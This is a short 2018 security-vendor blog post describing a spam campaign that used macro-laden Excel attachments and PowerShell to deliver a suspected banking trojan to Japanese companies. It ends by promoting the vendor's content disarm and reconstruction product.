JAPANESE UNDER THE CROSS-HAIR, AGAIN
March 04, 2018
A new malicious campaign is targeting Japanese firms, Votiro has discovered, in collaboration with cybersecurity consulting and intelligence company, ClearSky. The new campaign consists of spam with attached malicious Excel workbooks, which, once opened, activate macros that utilize PowerShell to download and execute a second-stage payload.
The spam may be in Japanese or English, but the workbooks are in Chinese – and the domain contacted to download the second payload is registered in Hong Kong. While that doesn’t prove the identity of the hackers, since IP addresses and domains can be spoofed, it’s pretty likely that the team behind this new campaign is based in China.
While we can make an educated guess at the hacker team’s location, we’re not quite sure what the second-stage payload is, or what it does. Further analysis will be required to determine that with certainty. With that, it appears to resemble various banking-trojans, with Zeus Panda banking trojan being a prime suspect. Banks may be among the targets, but the campaign appears to be hitting companies in a wide variety of industries, including insurance, construction, marketing, industrial supplies, and more. Several members of the security community have run into this new scam as well; see this analysis of a tainted workbook in the Any.run sandbox.
Only CDR can solve this; files are broken down to their lowest components, with the code for each component analyzed for anomalies or other signs that could indicate hacker activity. If the code or component is suspect, it gets dumped, with the file reconstructed and reconstituted to its full, working version – allowing recipients to work with any file without having to worry about who sent it, and what it can do. Whatever the senders of the suspect workbooks want from Japanese companies, they won’t get it from the firms that use CDR to protect their systems.